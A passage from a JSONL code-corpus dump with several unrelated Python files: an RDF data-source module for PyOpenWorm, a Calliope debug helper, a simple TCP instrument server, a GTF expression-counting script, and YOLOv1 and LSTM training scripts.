= '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n elif cls is None:\n for clas in classes:\n query = self.__session.query(classes[clas]).all()\n for obj in query:\n key = '{}.{}'.format(obj.__class__.__name__, obj.id)\n result[key] = obj\n return result\n\n def new(self, obj):\n \"\"\"new\"\"\"\n if obj:\n self.__session.add(obj)\n\n def save(self):\n \"\"\"save\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\"delete\"\"\"\n if obj is not None:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\"reload\"\"\"\n Base.metadata.create_all(self.__engine)\n X = sessionmaker(bind=self.__engine, expire_on_commit=False)\n Session = scoped_session(X)\n self.__session = Session()\n\n def close(self):\n \"\"\"close\"\"\"\n self.__session.remove()","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"517857640","text":"#!/usr/bin/env python\n\"\"\"\nCompute expression in the defined landing intervals associated with counting units\n\"\"\"\n\nimport sys\nimport optparse\nfrom maps.exp import DGE\n\n################################################################################\n\ndef process_command_line(argv):\n if argv is None:\n argv = sys.argv[1:]\n \n usage = \"%s\\nusage: prog [options] f_read f_gtf\" % __doc__\n parser = optparse.OptionParser(usage, \n formatter=optparse.TitledHelpFormatter(width=178),\n add_help_option=True)\n \n parser.add_option(\"-t\", \"--type\", type=\"string\", dest=\"featuretype\",\n default = \"exon\", help = \"feature type (3rd column in GTF file)[exon]\")\n \n parser.add_option(\"-u\", \"--unit\", type=\"string\", dest=\"unit\",\n default = \"transcript_id\", help = \"GTF attribute as counting unit[transcript_id]\")\n\n parser.add_option(\"-o\", \"--outfile\", type=\"string\", dest=\"outfile\",\n help = \"out file name\")\n\n (options, args) = parser.parse_args()\n \n if len(args) != 2:\n parser.error('No required parameters')\n \n return options, args\n\n################################################################################\n\ndef main():\n options, args = process_command_line(None)\n f_read = args[0]\n f_gtf = args[1]\n \n dge = DGE(f_read, f_gtf, feature_type=options.featuretype, \n id_feature = \"gene_id\", id_count=options.unit)\n\n outhandle = sys.stdout\n if options.outfile:\n outhandle = open(options.outfile, \"w\")\n \n dge.count(outhandle)\n \n if options.outfile:\n outhandle.close()\n \n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/land2exp.py","file_name":"land2exp.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"355883243","text":"from __future__ import print_function\nimport sqlite3\nimport hashlib\nfrom rdflib import URIRef, Literal, Graph, Namespace, ConjunctiveGraph\nfrom rdflib.namespace import RDFS, RDF, NamespaceManager\nfrom datetime import datetime as DT\nimport datetime\nimport transaction\nimport os\nimport traceback\nimport logging\nfrom .utils import grouper\nfrom .configure import Configureable, Configure, ConfigValue\n\n__all__ = [\n \"Data\",\n \"DataUser\",\n \"RDFSource\",\n \"SerializationSource\",\n \"TrixSource\",\n \"SPARQLSource\",\n \"SleepyCatSource\",\n \"DefaultSource\",\n \"ZODBSource\"]\n\nL = logging.getLogger(__name__)\n\n\n_B_UNSET = object()\n\n\nclass _B(ConfigValue):\n\n def __init__(self, f):\n self.v = _B_UNSET\n self.f = f\n\n def get(self):\n if self.v is _B_UNSET:\n self.v = self.f()\n\n return self.v\n\n def invalidate(self):\n self.v = None\n\n def __repr__(self):\n if self.v is _B_UNSET:\n return 'Thunk of ' + repr(self.f)\n return repr(self.v)\n\n\nZERO = datetime.timedelta(0)\n\n\nclass _UTC(datetime.tzinfo):\n\n \"\"\"UTC\"\"\"\n\n def utcoffset(self, dt):\n return ZERO\n\n def tzname(self, dt):\n return \"UTC\"\n\n def dst(self, dt):\n return ZERO\n\n\nutc = _UTC()\n\n\nclass DataUser(Configureable):\n\n \"\"\" A convenience wrapper for users of the database\n\n Classes which use the database should inherit from DataUser.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DataUser, self).__init__(*args, **kwargs)\n self.__base_namespace = None\n\n @property\n def base_namespace(self):\n if self.__base_namespace is not None:\n return self.__base_namespace\n return self.conf['rdf.namespace']\n\n @base_namespace.setter\n def base_namespace(self, value):\n self.__base_namespace = value\n\n @property\n def rdf(self):\n return self.conf['rdf.graph']\n\n @property\n def namespace_manager(self):\n return self.conf.get('rdf.namespace_manager', None)\n\n def _remove_from_store(self, g):\n # Note the assymetry with _add_to_store. You must add actual elements, but deletes\n # can be performed as a query\n for group in grouper(g, 1000):\n temp_graph = Graph()\n for x in group:\n if x is not None:\n temp_graph.add(x)\n else:\n break\n s = \" DELETE DATA {\" + temp_graph.serialize(format=\"nt\") + \" } \"\n L.debug(\"deleting. s = \" + s)\n self.conf['rdf.graph'].update(s)\n\n def _add_to_store(self, g, graph_name=False):\n if self.conf['rdf.store'] == 'SPARQLUpdateStore':\n # XXX With Sesame, for instance, it is probably faster to do a PUT over\n # the endpoint's rest interface. Just need to do it for some common\n # endpoints\n\n try:\n gs = g.serialize(format=\"nt\")\n except Exception:\n gs = _triples_to_bgp(g)\n\n if graph_name:\n s = \" INSERT DATA { GRAPH \" + graph_name.n3() + \" {\" + gs + \" } } \"\n else:\n s = \" INSERT DATA { \" + gs + \" } \"\n L.debug(\"update query = \" + s)\n self.conf['rdf.graph'].update(s)\n else:\n gr = self.conf['rdf.graph']\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n for x in g:\n gr.add(x)\n if self.conf['rdf.source'] == 'ZODB':\n transaction.commit()\n transaction.begin()\n\n # infer from the added statements\n # self.infer()\n\n def infer(self):\n \"\"\" Fire FuXi rule engine to infer triples \"\"\"\n\n from FuXi.Rete.RuleStore import SetupRuleStore\n from FuXi.Rete.Util import generateTokenSet\n from FuXi.Horn.HornRules import HornFromN3\n # fetch the derived object's graph\n semnet = self.rdf\n rule_store, rule_graph, network = SetupRuleStore(makeNetwork=True)\n closureDeltaGraph = Graph()\n network.inferredFacts = closureDeltaGraph\n # build a network of rules\n for rule in HornFromN3('testrules.n3'):\n network.buildNetworkFromClause(rule)\n # apply rules to original facts to infer new facts\n network.feedFactsToAdd(generateTokenSet(semnet))\n # combine original facts with inferred facts\n for x in closureDeltaGraph:\n self.rdf.add(x)\n\n def add_reference(self, g, reference_iri):\n \"\"\"\n Add a citation to a set of statements in the database\n\n :param triples: A set of triples to annotate\n \"\"\"\n new_statements = Graph()\n ns = self.conf['rdf.namespace']\n for statement in g:\n statement_node = self._reify(new_statements, statement)\n new_statements.add(\n (URIRef(reference_iri),\n ns['asserts'],\n statement_node))\n\n self.add_statements(g + new_statements)\n\n def retract_statements(self, graph):\n \"\"\"\n Remove a set of statements from the database.\n\n :param graph: An iterable of triples\n \"\"\"\n self._remove_from_store_by_query(graph)\n\n def _remove_from_store_by_query(self, q):\n s = \" DELETE WHERE {\" + q + \" } \"\n L.debug(\"deleting. s = \" + s)\n self.conf['rdf.graph'].update(s)\n\n def add_statements(self, graph):\n \"\"\"\n Add a set of statements to the database.\n Annotates the addition with uploader name, etc\n\n :param graph: An iterable of triples\n \"\"\"\n self._add_to_store(graph)\n\n def _reify(self, g, s):\n \"\"\"\n Add a statement object to g that binds to s\n \"\"\"\n n = self.conf['new_graph_uri'](s)\n g.add((n, RDF['type'], RDF['Statement']))\n g.add((n, RDF['subject'], s[0]))\n g.add((n, RDF['predicate'], s[1]))\n g.add((n, RDF['object'], s[2]))\n return n\n\n\nclass Data(Configure):\n\n \"\"\"\n Provides configuration for access to the database.\n\n Usually doesn't need to be accessed directly\n \"\"\"\n\n def __init__(self, conf=None, **kwargs):\n \"\"\"\n Parameters\n ----------\n conf : Configure\n A Configure object\n \"\"\"\n super(Data, self).__init__(**kwargs)\n\n if conf is not None:\n self.copy(conf)\n else:\n self.copy(Configureable.default)\n self.namespace = Namespace(\"http://openworm.org/entities/\")\n self.molecule_namespace = Namespace(\"http://openworm.org/entities/molecules/\")\n self['rdf.namespace'] = self.namespace\n self['molecule_name'] = self._molecule_hash\n self['new_graph_uri'] = self._molecule_hash\n\n @classmethod\n def load(cls, file_name):\n \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n return cls.open(file_name)\n\n @classmethod\n def open(cls, file_name):\n \"\"\" Load a file into a new Data instance storing configuration in a JSON format \"\"\"\n return cls(conf=Configure.open(file_name))\n\n def openDatabase(self):\n self.init_database()\n\n def init_database(self):\n \"\"\" Open the configured database \"\"\"\n self._init_rdf_graph()\n L.debug(\"opening \" + str(self.source))\n self.source.open()\n nm = NamespaceManager(self['rdf.graph'])\n self['rdf.namespace_manager'] = nm\n self['rdf.graph'].namespace_manager = nm\n\n # A runtime version number for the graph should update for all changes\n # to the graph\n self['rdf.graph.change_counter'] = 0\n\n self['rdf.graph']._add = self['rdf.graph'].add\n self['rdf.graph']._remove = self['rdf.graph'].remove\n self['rdf.graph'].add = self._my_graph_add\n self['rdf.graph'].remove = self._my_graph_remove\n nm.bind(\"\", self['rdf.namespace'])\n\n def _my_graph_add(self, triple):\n self['rdf.graph']._add(triple)\n\n # It's important that this happens _after_ the update otherwise anyone\n # checking could think they have the lastest version when they don't\n self['rdf.graph.change_counter'] += 1\n\n def _my_graph_remove(self, triple_or_quad):\n self['rdf.graph']._remove(triple_or_quad)\n\n # It's important that this happens _after_ the update otherwise anyone\n # checking could think they have the lastest version when they don't\n self['rdf.graph.change_counter'] += 1\n\n def closeDatabase(self):\n \"\"\" Close a the configured database \"\"\"\n self.source.close()\n\n def _init_rdf_graph(self):\n # Set these in case they were left out\n self['rdf.source'] = self.get('rdf.source', 'default')\n self['rdf.store'] = self.get('rdf.store', 'default')\n self['rdf.store_conf'] = self.get('rdf.store_conf', 'default')\n\n # XXX:The conf=self can probably be removed\n self.sources = {'sqlite': SQLiteSource,\n 'sparql_endpoint': SPARQLSource,\n 'sleepycat': SleepyCatSource,\n 'default': DefaultSource,\n 'trix': TrixSource,\n 'serialization': SerializationSource,\n 'zodb': ZODBSource}\n source = self.sources[self['rdf.source'].lower()](conf=self)\n self.source = source\n\n self.link('semantic_net_new', 'semantic_net', 'rdf.graph')\n self['rdf.graph'] = source\n return source\n\n def _molecule_hash(self, data):\n return URIRef(\n self.molecule_namespace[\n hashlib.sha224(\n str(data)).hexdigest()])\n\n def __setitem__(self, k, v):\n return Configure.__setitem__(self, k, v)\n\n def __getitem__(self, k):\n return Configure.__getitem__(self, k)\n\n\ndef modification_date(filename):\n t = os.path.getmtime(filename)\n return datetime.datetime.fromtimestamp(t)\n\n\nclass RDFSource(Configureable, ConfigValue):\n\n \"\"\" Base class for data sources.\n\n Alternative sources should dervie from this class\n \"\"\"\n\n def __init__(self, **kwargs):\n super(RDFSource, self).__init__(**kwargs)\n self.graph = False\n\n def get(self):\n if self.graph is False:\n raise Exception(\n \"Must call openDatabase on Data object before using the database\")\n return self.graph\n\n def close(self):\n if self.graph is False:\n return\n self.graph.close()\n self.graph = False\n\n def open(self):\n \"\"\" Called on ``PyOpenWorm.connect()`` to set up and return the rdflib graph.\n Must be overridden by sub-classes.\n \"\"\"\n raise NotImplementedError()\n\n\nclass SerializationSource(RDFSource):\n\n \"\"\" Reads from an RDF serialization or, if the configured database is more\n recent, then from that.\n\n The database store is configured with::\n\n \"rdf.source\" = \"serialization\"\n \"rdf.store\" = \n \"rdf.serialization\" = \n \"rdf.serialization_format\" = \n \"rdf.store_conf\" = \n\n \"\"\"\n\n def open(self):\n if not self.graph:\n self.graph = True\n import glob\n # Check the ages of the files. Read the more recent one.\n g0 = ConjunctiveGraph(store=self.conf['rdf.store'])\n database_store = self.conf['rdf.store_conf']\n source_file = self.conf['rdf.serialization']\n file_format = self.conf['rdf.serialization_format']\n # store_time only works for stores that are on the local\n # machine.\n try:\n store_time = modification_date(database_store)\n # If the store is newer than the serialization\n # get the newest file in the store\n for x in glob.glob(database_store + \"/*\"):\n mod = modification_date(x)\n if store_time < mod:\n store_time = mod\n except Exception:\n store_time = DT.min\n\n trix_time = modification_date(source_file)\n\n g0.open(database_store, create=True)\n\n if store_time > trix_time:\n # just use the store\n pass\n else:\n # delete the database and read in the new one\n # read in the serialized format\n g0.parse(source_file, format=file_format)\n\n self.graph = g0\n\n return self.graph\n\n\nclass TrixSource(SerializationSource):\n\n \"\"\" A SerializationSource specialized for TriX\n\n The database store is configured with::\n\n \"rdf.source\" = \"trix\"\n \"rdf.trix_location\" = \n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n \"\"\"\n\n def __init__(self, **kwargs):\n SerializationSource.__init__(self, **kwargs)\n h = self.conf.get('trix_location', 'UNSET')\n self.conf.link('rdf.serialization', 'trix_location')\n self.conf['rdf.serialization'] = h\n self.conf['rdf.serialization_format'] = 'trix'\n\n\ndef _rdf_literal_to_gp(x):\n return x.n3()\n\n\ndef _triples_to_bgp(trips):\n # XXX: Collisions could result between the variable names of different\n # objects\n g = \" .\\n\".join(\" \".join(_rdf_literal_to_gp(x) for x in y) for y in trips)\n return g\n\n\nclass SPARQLSource(RDFSource):\n\n \"\"\" Reads from and queries against a remote data store\n\n ::\n\n \"rdf.source\" = \"sparql_endpoint\"\n \"\"\"\n\n def open(self):\n # XXX: If we have a source that's read only, should we need to set the\n # store separately??\n g0 = ConjunctiveGraph('SPARQLUpdateStore')\n g0.open(tuple(self.conf['rdf.store_conf']))\n self.graph = g0\n return self.graph\n\n\nclass SleepyCatSource(RDFSource):\n\n \"\"\" Reads from and queries against a local Sleepycat database\n\n The database can be configured like::\n\n \"rdf.source\" = \"Sleepycat\"\n \"rdf.store_conf\" = \n \"\"\"\n\n def open(self):\n import logging\n # XXX: If we have a source that's read only, should we need to set the\n # store separately??\n g0 = ConjunctiveGraph('Sleepycat')\n self.conf['rdf.store'] = 'Sleepycat'\n g0.open(self.conf['rdf.store_conf'], create=True)\n self.graph = g0\n logging.debug(\"Opened SleepyCatSource\")\n\n\nclass SQLiteSource(RDFSource):\n\n \"\"\" Reads from and queries against a SQLite database\n\n See see the SQLite database :file:`db/celegans.db` for the format\n\n The database store is configured with::\n\n \"rdf.source\" = \"Sleepycat\"\n \"sqldb\" = \"/home/USER/openworm/PyOpenWorm/db/celegans.db\",\n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n Leaving ``rdf.store`` unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def open(self):\n conn = sqlite3.connect(self.conf['sqldb'])\n cur = conn.cursor()\n\n # first step, grab all entities and add them to the graph\n n = self.conf['rdf.namespace']\n\n cur.execute(\"SELECT DISTINCT ID, Entity FROM tblentity\")\n g0 = ConjunctiveGraph(self.conf['rdf.store'])\n g0.open(self.conf['rdf.store_conf'], create=True)\n\n for r in cur.fetchall():\n # first item is a number -- needs to be converted to a string\n first = str(r[0])\n # second item is text\n second = str(r[1])\n\n # This is the backbone of any RDF graph. The unique\n # ID for each entity is encoded as a URI and every other piece of\n # knowledge about that entity is connected via triples to that URI\n # In this case, we connect the common name of that entity to the\n # root URI via the RDFS label property.\n g0.add((n[first], RDFS.label, Literal(second)))\n\n # second step, get the relationships between them and add them to the\n # graph\n cur.execute(\n \"SELECT DISTINCT EnID1, Relation, EnID2, Citations FROM tblrelationship\")\n\n gi = ''\n\n i = 0\n for r in cur.fetchall():\n # all items are numbers -- need to be converted to a string\n first = str(r[0])\n second = str(r[1])\n third = str(r[2])\n prov = str(r[3])\n\n ui = self.conf['molecule_name'](prov)\n gi = Graph(g0.store, ui)\n\n gi.add((n[first], n[second], n[third]))\n\n g0.add([ui, RDFS.label, Literal(str(i))])\n if (prov != ''):\n g0.add([ui, n[u'text_reference'], Literal(prov)])\n\n i = i + 1\n\n cur.close()\n conn.close()\n self.graph = g0\n\n\nclass DefaultSource(RDFSource):\n\n \"\"\" Reads from and queries against a configured database.\n\n The default configuration.\n\n The database store is configured with::\n\n \"rdf.source\" = \"default\"\n \"rdf.store\" = \n \"rdf.store_conf\" = \n\n Leaving unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def open(self):\n self.graph = ConjunctiveGraph(self.conf['rdf.store'])\n self.graph.open(self.conf['rdf.store_conf'], create=True)\n\n\nclass ZODBSource(RDFSource):\n\n \"\"\" Reads from and queries against a configured Zope Object Database.\n\n If the configured database does not exist, it is created.\n\n The database store is configured with::\n\n \"rdf.source\" = \"ZODB\"\n \"rdf.store_conf\" = \n\n Leaving unconfigured simply gives an in-memory data store.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ZODBSource, self).__init__(*args, **kwargs)\n self.conf['rdf.store'] = \"ZODB\"\n\n def open(self):\n import ZODB\n from ZODB.FileStorage import FileStorage\n self.path = self.conf['rdf.store_conf']\n openstr = os.path.abspath(self.path)\n\n fs = FileStorage(openstr)\n self.zdb = ZODB.DB(fs, cache_size=1600)\n self.conn = self.zdb.open()\n root = self.conn.root()\n if 'rdflib' not in root:\n root['rdflib'] = ConjunctiveGraph('ZODB')\n self.graph = root['rdflib']\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n L.warning('Forced to abort transaction on ZODB store opening')\n traceback.print_exc()\n transaction.abort()\n transaction.begin()\n self.graph.open(self.path)\n\n def close(self):\n if self.graph is False:\n return\n\n self.graph.close()\n\n try:\n transaction.commit()\n except Exception:\n # catch commit exception and close db.\n # otherwise db would stay open and follow up tests\n # will detect the db in error state\n traceback.print_exc()\n L.warning('Forced to abort transaction on ZODB store closing')\n transaction.abort()\n self.conn.close()\n self.zdb.close()\n self.graph = False\n","sub_path":"PyOpenWorm/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":19609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"631712949","text":"\"\"\"\nCopyright (C) 2013-2018 Calliope contributors listed in AUTHORS.\nLicensed under the Apache 2.0 License (see LICENSE file).\n\ndebug.py\n~~~~~~~~\n\nDebugging tools.\n\n\"\"\"\n\nfrom functools import reduce\nimport operator\n\nimport ruamel.yaml as ruamel_yaml\n\n\ndef get_from_dict(data_dict, map_list):\n return reduce(operator.getitem, map_list, data_dict)\n\n\ndef apply_to_dict(data_dict, map_list, func, args):\n getattr(get_from_dict(data_dict, map_list[:-1])[map_list[-1]], func)(*args)\n\n\ndef save_debug_data(model_run, debug_data, out_file):\n # README: currently based on ruamel.yaml 0.15 which is a mix of old\n # and new API - possibly needs a bit of rewriting once ruamel.yaml\n # has progressed a bit further\n yaml = ruamel_yaml.YAML()\n\n model_run_debug = model_run.copy()\n del model_run_debug['timeseries_data'] # Can't be serialised!\n\n # Turn sets in model_run into lists for YAML serialization\n for k, v in model_run_debug.sets.items():\n model_run_debug.sets[k] = list(v)\n\n debug_comments = debug_data['comments']\n debug_yaml = yaml.load(yaml.dump(model_run_debug.as_dict()))\n for k in debug_comments.model_run.keys_nested():\n v = debug_comments.model_run.get_key(k)\n keys = k.split('.')\n apply_to_dict(debug_yaml, keys[:-1], 'yaml_add_eol_comment', (v, keys[-1]))\n\n dumper = ruamel_yaml.dumper.RoundTripDumper\n dumper.ignore_aliases = lambda self, data: True\n\n with open(out_file, 'w') as f:\n ruamel_yaml.dump(\n debug_yaml, f,\n Dumper=dumper, default_flow_style=False\n )\n","sub_path":"calliope/core/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"364358316","text":"import threading, SocketServer, pickle, time, numpy\nimport socket\n\nclass TCPHandler(SocketServer.BaseRequestHandler):\n def handle(self):\n # self.request is the TCP socket connected to the client\n self.data = self.request.recv(1024).strip()\n # Check is present in dictionary\n if self.data == \"log\":\n self.request.send(self.server.log)\n return\n if self.data == \"monitor\":\n self.request.send(pickle.dumps(self.server.values))\n \n try:\n self.response = self.server.commands[self.data]()\n self.request.send(self.response)\n except:\n self.request.send(self.server.log)\n\ndef server(host = \"\", port = 9999, commands= {'log': 0}):\n #HOST, PORT = \"192.168.5.24\", 9999\n # Create the server, binding to localhost on port 9999\n server = SocketServer.TCPServer((host, port), TCPHandler)\n server_thread = threading.Thread(target=server.serve_forever)\n server_thread.start()\n \n server.log = \"\"\n server.values = []\n \n return server\n\ndef connect(command, host, port = 9999):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.send(command)\n data = s.recv(2**15)\n \n return data\n s.close()\n \n \nif __name__ == '__main__':\n s = server()\n i = 0\n while True:\n i = i +1\n time.sleep(0.3)\n s.values = [numpy.linspace(i,i+2,3),numpy.linspace(i-5,i+2-5,3),]\n ","sub_path":"control/inst_server.py","file_name":"inst_server.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"142809225","text":"# import library\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nimport torchvision\nimport glob\nimport os\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport datetime\n\n# import self-made function\nfrom dataset import hw2DataSet\nfrom models import Yolov1_vgg16bn\nfrom yoloLoss import yoloLoss\n\n#############################\n#1. Creating a custom dataset\n#############################\n#[2]\n# load the trainset and testset\ntrainset = hw2DataSet(root='../hw2_train_val/train15000/',\n transform=transforms.ToTensor())\ntestset = hw2DataSet(root='../hw2_train_val/val1500/',\n transform=transforms.ToTensor())\nprint('# images in trainset:', len(trainset))\nprint('# images in testset:', len(testset))\n\n\n#[3]\n# Use the torch dataloader to iterate through the dataset\ntrainset_loader = DataLoader(trainset, batch_size=16, shuffle=True, num_workers=4)\ntestset_loader = DataLoader(testset, batch_size=16, shuffle=False, num_workers=4)\n# get some random training images\ndataiter = iter(trainset_loader)\nimages, labels = dataiter.next()\nprint('Image tensor in each batch:', images.shape, images.dtype)\nprint('Label tensor in each batch:', labels.shape, labels.dtype)\n\n\n#[4]\n# We can visualize what contains in each batch:\n# functions to show an image\ndef imshow(img):\n npimg = img.numpy() # transfer torch to numpy\n plt.imshow(np.transpose(npimg, (1, 2, 0))) #if using numpy image tranfered from torch\n# functions to show an image's label in 7x7x26\ndef labelshow(img_number):\n for patchi in range(7):\n for patchj in range(7):\n print (patchi,patchj,labels[img_number][patchi][patchj])\n\n# show images and label\n'''imshow(torchvision.utils.make_grid(images))\nlabelshow(0)\nplt.show()'''\n\n\n###########################################\n#2. Creating a Convolutional Neural Network\n###########################################\n#[5]\n# Use GPU if available, otherwise stick with cpu\nuse_cuda = torch.cuda.is_available()\ntorch.manual_seed(123)\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\nprint('Device used:', device)\n\n\n#[6]\n# import model from model.py\nmodel = Yolov1_vgg16bn(pretrained=True).to(device) # Remember to move the model to \"device\"\nprint(model)\nlogfile = open('log.txt', 'w')\n\ndef load_checkpoint(checkpoint_path, model,optimizer):\n state = torch.load(checkpoint_path) # for cuda\n #state = torch.load(checkpoint_path, map_location=device) #for cpu\n model.load_state_dict(state['state_dict'])\n optimizer.load_state_dict(state['optimizer'])\n print('model loaded from %s' % checkpoint_path)\n\n#####################\n#3. Train the network\n#####################\n#[7]\n# define the training loop\ndef train(model, epoch, log_interval=10):\n learning_rate = 0.002\n optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, momentum=0.9, weight_decay=5e-4)\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n load_checkpoint(\"map0799/best.pth\",model,optimizer)\n best_test_loss = np.inf\n iteration = 0 # one iteration would go through a ep\n for ep in range(epoch):\n model.train() # Important: set training mode\n if ep == 0:\n learning_rate = 0.001\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n if ep == 20:\n learning_rate = 0.0005\n for param_group in optimizer.param_groups:\n param_group['lr'] = learning_rate\n #total_loss = 0.\n for batch_idx,(images,target) in enumerate(trainset_loader):\n images, target = images.to(device), target.to(device)\n optimizer.zero_grad() #to zero\n pred = model(images)\n loss = criterion(pred,target)\n #total_loss += loss.images[0]\n loss.backward() #backpro\n optimizer.step() #update\n #optimizer.zero_grad() #to zero\n if iteration % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n ep, batch_idx * len(images), len(trainset_loader.dataset),\n 100. * batch_idx / len(trainset_loader), loss.item()))\n iteration += 1\n\n # Evaluate at the end of each epoch\n best_test_loss = validation(model,optimizer,best_test_loss,ep)\n\n\n#[8]\n# evaluate at the end of each epoch.\ndef validation(model,optimizer,best_test_loss,ep):\n model.eval()\n criterion = yoloLoss(5,0.05)\n #criterion = nn.MSELoss()\n validation_loss = 0.0\n with torch.no_grad(): # This will free the GPU memory used for back-prop\n for batch_idx,(images,target) in enumerate(testset_loader):\n images, target = images.to(device), target.to(device)\n pred = model(images)\n loss = criterion(pred,target)\n validation_loss += loss.item()\n validation_loss /= len(testset_loader)\n print (\"validation avg loss:\" + str(validation_loss) + '\\n')\n\n # save best loss as best.pth\n if best_test_loss > validation_loss:\n best_test_loss = validation_loss\n print('get best test loss %.5f' % best_test_loss)\n save_checkpoint('best.pth',model,optimizer)\n if ep%10==0:\n save_checkpoint('best_'+str(ep)+'.pth',model,optimizer)\n\n # write to logfile\n logfile.writelines(\"ep: \"+str(ep)+\" validation avg loss:\" + str(validation_loss) + \"\\n\")\n logfile.flush()\n\n return best_test_loss\n\ndef save_checkpoint(checkpoint_path, model, optimizer):\n state = {'state_dict': model.state_dict(),\n 'optimizer' : optimizer.state_dict()}\n torch.save(state, checkpoint_path)\n print('model saved to %s' % checkpoint_path)\n\n#[9]\n# It's time to train the model!\nepochs_num = 50\nnow = datetime.datetime.now()\nlogfile.writelines(\"start training at:\"+str(now)+\"\\n\")\nlogfile.flush()\ntrain(model, epochs_num)\nnow = datetime.datetime.now()\nlogfile.writelines(\"end training at:\"+str(now)+\"\\n\")\nlogfile.flush()\n","sub_path":"hw2_YOLOv1_object_detection/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474431890","text":"import os\nimport time\nimport numpy as np\nimport csv\nimport pickle\nimport json\nimport keras.backend as K\n\nfrom keras.models import Model\nfrom keras.layers import Dense, Activation, Input, LSTM, Embedding, Dropout, TimeDistributed\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import LambdaCallback, CSVLogger, History, ModelCheckpoint\n\nfrom clean_data import tokenize_dir, clean_tokens\nfrom embed_words import train_word_model, dictionary_lookups, vectorize_words\n\n# working directory\npath = os.getcwd()\n\n# define data file and file extension\n# replace with location of data-set\ndata_path = ''\nextension = 'csv'\n\n# for saving\nversion_name = 'primary_train'\n\n# START\n# ----\n\n# LOAD DATA\n# --\n\nprint('\\nLoading data...')\n\nprint('Start-Time: ', time.ctime(time.time()))\ncorpus = tokenize_dir(data_path, extension)\nprint('End-Time: ', time.ctime(time.time()))\n\n# clean tokenize corpus\nsentences, max_sentence, max_sentence_len = clean_tokens(corpus)\n\nprint(\"max: %d \" % max_sentence_len)\n\nprint('Num sentences in original corpus:', len(corpus))\nprint('Num sentences for model:', len(sentences))\n\n# print('\\nTRAINING CORPUS: \\n' + corpus)\n\n\n# GENERATE EMBEDDINGS\n# ---------------\n\nprint('\\nCreating word embeddings...')\n# train and save the embedding model\nword_model = train_word_model(corpus, 'word_model')\n\n# get the initial model weight\nembed_weights = word_model.wv.syn0\n# get the vocab size and embedding shape for model\nvocab_size, embedding_size = embed_weights.shape\n\n# get the dictionary lookup functions\nword_to_index, index_to_word = dictionary_lookups(word_model)\n\n# VECTORIZE WORDS\n# ----------------\n\nprint('\\nVectorizing words...')\n# define the shape of input & output matrices\n# input shape (no sentences, max-sentence-size)\ntrain_input = np.zeros([len(sentences), max_sentence_len], dtype=np.int32)\n\n# output shape (no sentences, max-sentence-size, 1)\ntrain_output = np.zeros([len(sentences), max_sentence_len, 1], dtype=np.int32)\n\n# populate model vectors with word embedding data\ntrain_input, train_output = vectorize_words(sentences, train_input, train_output, word_to_index)\n\nprint('\\ntrain_input shape:', train_input.shape)\nprint('train_output shape:', train_output.shape)\n\n# MODEL SETUP\n# ------------------\nprint('\\nConstructing Model...')\n\n# define the model layers\nmodel_input = Input(shape=(None,))\nmodel_embed = Embedding(input_dim=vocab_size, output_dim=embedding_size, weights=[embed_weights])\nmodel_lstm_1 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_1 = Dropout(0.2)\nmodel_lstm_2 = LSTM(units=embedding_size, return_sequences=True, return_state=False)\nmodel_dropout_2 = Dropout(0.2)\nmodel_dense = TimeDistributed(Dense(units=vocab_size))\nmodel_activation = Activation('softmax')\n# Connect layers\nembedded = model_embed(model_input)\nlstm_1_output = model_lstm_1(embedded)\ndropout_1_output = model_dropout_1(lstm_1_output)\nlstm_2_output = model_lstm_2(dropout_1_output)\ndropout_2_output = model_dropout_2(lstm_2_output)\ndense_output = model_dense(dropout_2_output)\nmodel_output = model_activation(dense_output)\n\n\n# Define the model\nprimary_model = Model(model_input, model_output)\n\n# Define optimizer\nrms_prop = RMSprop(lr=0.001, rho=0.9, epsilon=None, decay=0.0)\n\n\n# Define custom evaluation metrics\ndef perplexity(y_true, y_pred):\n cross_entropy = K.sparse_categorical_crossentropy(y_true, y_pred)\n perplexity = K.pow(2.0, cross_entropy)\n # perplexity = 2 ** cross_entropy\n return perplexity\n\n\ndef crossentropy(y_true, y_pred):\n return K.sparse_categorical_crossentropy(y_true, y_pred)\n\n\n# Compile model\nprimary_model.compile(\n 